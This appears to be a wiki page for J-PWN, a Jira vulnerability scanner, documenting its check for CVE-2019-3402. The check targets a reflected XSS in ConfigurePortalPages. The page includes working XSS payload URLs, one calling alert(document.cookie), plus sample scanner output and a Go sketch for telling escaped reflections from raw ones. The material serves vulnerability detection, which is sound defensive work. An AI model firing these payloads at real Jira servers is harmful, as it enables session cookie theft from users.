CVE-2019-3402 - carnal0wnage/J-PWN GitHub Wiki

CVE-2019-3402

Category [XSS]

[CG] This check is currently excluded when you run all Jira checks because it always returns true: the particular page prints the XSS string even on patched versions. You can run it manually with the --module option.

module name: check_cve_2019_3402

url: secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert("XSS_TEST")%3C%2fscript%3Et1nmk&Search=Search

INFO: Checking for CVE-2019-3402 (XSS)
[Testing URL]: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert("XSS_TEST")%3C%2fscript%3Et1nmk&Search=Search
[+] [XSS] Vulnerable to CVE-2019-3402: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert("XSS_TEST")%3C%2fscript%3Et1nmk&Search=Search
[+] URL: http://JIRA/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(document.cookie)%3C%2fscript%3Et1nmk&Search=Search
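One way to cut the false positive described in the [CG] note is to check how the probe comes back rather than whether it appears at all. The sketch below is an added example, not J-PWN's own code; it assumes a patched instance reflects the value HTML-escaped (the page only says the string is printed), and the function name `classify` and the sample response fragments are constructed for illustration.

```go
package main

import (
	"fmt"
	"html"
	"strings"
)

// Probe from the page's test URL (URL-decoded) and its two marker strings.
const (
	probe = `x2rnu<script>alert("XSS_TEST")</script>t1nmk`
	head  = "x2rnu"
	tail  = "t1nmk"
)

// classify reports how the probe is reflected in a response body:
// "raw" (unescaped markup present), "encoded" (only HTML-escaped copies,
// which a browser renders as text) or "absent".
func classify(body string) string {
	result := "absent"
	for {
		i := strings.Index(body, head)
		if i < 0 {
			return result
		}
		body = body[i:]
		if strings.HasPrefix(body, probe) {
			return "raw" // one unescaped copy is enough to flag
		}
		// Look for the closing marker and compare the decoded span.
		if j := strings.Index(body, tail); j > 0 && j < 4*len(probe) {
			if html.UnescapeString(body[:j+len(tail)]) == probe {
				result = "encoded"
			}
		}
		body = body[len(head):]
	}
}

func main() {
	// Constructed response fragments, not captured from a real Jira instance.
	patched := `<input value="x2rnu&lt;script&gt;alert(&#34;XSS_TEST&#34;)&lt;/script&gt;t1nmk">`
	vulnerable := `<p>Owner: x2rnu<script>alert("XSS_TEST")</script>t1nmk</p>`
	fmt.Println(classify(patched), classify(vulnerable)) // encoded raw
}
```

A `raw` result still deserves a look at the surrounding markup, since an unescaped copy inside an inert element such as a `<textarea>` does not execute.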

CVE-2019-3402-XSS

Reference: https://jira.atlassian.com/browse/JRASERVER-69243

Description

The ConfigurePortalPages.jspa resource in Jira

  • before version 7.13.3
  • from version 8.0.0 before version 8.1.1

allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.